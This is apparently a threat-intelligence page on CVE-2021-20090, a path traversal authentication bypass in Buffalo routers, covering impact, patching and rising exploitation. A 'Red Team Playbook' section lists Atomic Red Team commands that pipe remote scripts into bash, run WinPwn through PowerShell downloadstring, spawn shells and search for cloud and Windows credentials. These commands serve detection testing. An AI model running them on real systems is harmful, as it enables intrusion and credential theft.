CVE-2021-20090
Overview
This vulnerability is a path traversal flaw in the web interface of specific Buffalo router firmware versions. It arises from improper sanitization of user-supplied input in the HTTP request, allowing traversal sequences to bypass authentication checks. The affected component is the embedded web server handling HTTP GET requests for resource retrieval on Buffalo WSR-2533DHPL2 firmware versions up to 1.02 and WSR-2533DHP3 firmware versions up to 1.24.
Vulnerability Description
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
Impact
An unauthenticated attacker can exploit this vulnerability remotely without any user interaction to bypass authentication and read sensitive files on the device, including configuration files and stored credentials. This unauthorized access can lead to exposure of critical network information and potentially facilitate further attacks such as device takeover or lateral movement within the network. The vulnerability compromises the confidentiality and integrity of the router’s management interface and stored data.
Solution
Buffalo recommends upgrading affected devices to firmware versions later than 1.02 for WSR-2533DHPL2 and later than 1.24 for WSR-2533DHP3, as detailed in their security advisories. Users should consult the official Buffalo support site and the referenced Tenable advisory for instructions on applying these updates. No specific workaround is provided; timely firmware update is the primary remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identified vulnerability in the web interfaces of specific Buffalo router firmware versions presents a significant security risk due to its nature as a path traversal flaw. This type of vulnerability allows an attacker to manipulate the file path used by the application, enabling unauthorized access to sensitive files and directories on the server. In this case, the affected firmware versions are vulnerable to unauthenticated remote access, meaning that attackers do not need valid credentials to exploit the flaw. By crafting a malicious request, an attacker can traverse the file system and potentially access configuration files or other sensitive data that should be protected, leading to further exploitation of the device or the network it is connected to.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving the web interface of the affected routers. An attacker could use automated tools or manually crafted HTTP requests to exploit the flaw. For instance, by appending directory traversal sequences (such as "../") to the URL, an attacker could gain access to restricted directories. Once inside, they could retrieve configuration files that contain sensitive information, such as passwords, network settings, or even firmware binaries. This access could lead to further attacks, including the possibility of altering device settings, redirecting traffic, or using the compromised device as a launchpad for attacks against other systems on the network.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on these routers for their network infrastructure. The potential for unauthorized access to sensitive information poses a significant business risk, as it could lead to data breaches, loss of customer trust, and regulatory penalties. Additionally, if an attacker gains control over the router, they could manipulate traffic, conduct man-in-the-middle attacks, or use the device to propagate malware within the network. The financial implications of such incidents can be severe, encompassing not only immediate remediation costs but also long-term reputational damage.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, they should conduct regular security assessments and vulnerability scans on their network devices to identify and remediate any weaknesses. Keeping firmware up to date is crucial; users should apply patches and updates provided by the manufacturer as soon as they become available. Furthermore, network segmentation can help limit the exposure of critical systems to potential attacks originating from compromised devices. Employing intrusion detection systems (IDS) can also aid in monitoring for unusual activity that may indicate exploitation attempts.
In conclusion, the path traversal vulnerability in the specified Buffalo router firmware versions represents a critical security concern that requires immediate attention from affected users. The ability for unauthenticated attackers to gain access to sensitive files poses significant risks to both individual users and organizations. By understanding the technical details of the vulnerability, recognizing potential attack vectors, and implementing robust detection and mitigation strategies, organizations can protect themselves from the severe consequences associated with such security flaws. Proactive measures and a commitment to maintaining security hygiene are essential in safeguarding network infrastructure against evolving threats.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-20090, with telemetry indicating a sharp increase in attempts to exploit the path traversal vulnerability in Buffalo WSR-2533DHPL2 and WSR-2533DHP3 firmware. Correspondingly, the Exploit Prediction Scoring System (EPSS) score for this vulnerability has risen significantly, nearing certainty of exploitation. Although no new exploit techniques or ransomware associations have been identified, the surge in detection activity signals growing adversary interest and potential weaponization. This development elevates the threat posture for defenders, underscoring an increased likelihood of unauthenticated remote attacks that bypass authentication controls. Consequently, the risk level associated with this vulnerability has intensified, warranting heightened vigilance in monitoring and response efforts within affected environments.
Update 2 — July 06, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-20090, indicating increased adversary engagement with this critical path traversal vulnerability. While no novel exploit techniques or ransomware affiliations have surfaced, the uptick in telemetry suggests that threat actors are intensifying reconnaissance or preliminary exploitation attempts against vulnerable Buffalo firmware versions. This heightened activity signals a growing operational interest that could precede more widespread or sophisticated attacks. For defenders, this development underscores an elevated risk of unauthenticated remote compromise, necessitating enhanced monitoring of network traffic and authentication logs for anomalous behavior. The threat level associated with CVE-2021-20090 has accordingly increased, reflecting a transition from theoretical risk to a more imminent and actionable threat within affected environments.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Buffalo | Wsr-2533dhpl2-Bk Firmware | All |
cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
|
|
|
Buffalo | Wsr-2533dhp3-Bk Firmware | All |
cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-20090 |
| tenable.com |
GitHub CVE
|
https://www.tenable.com/security/research/tra-2021-13 |
| kb.cert.org |
GitHub CVE
third-party-advisory
|
https://www.kb.cert.org/vuls/id/914124 |
| secpod.com |
GitHub CVE
|
https://www.secpod.com/blog/arcadyan-based-routers-and-modems-under-active-exploitation/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20090 |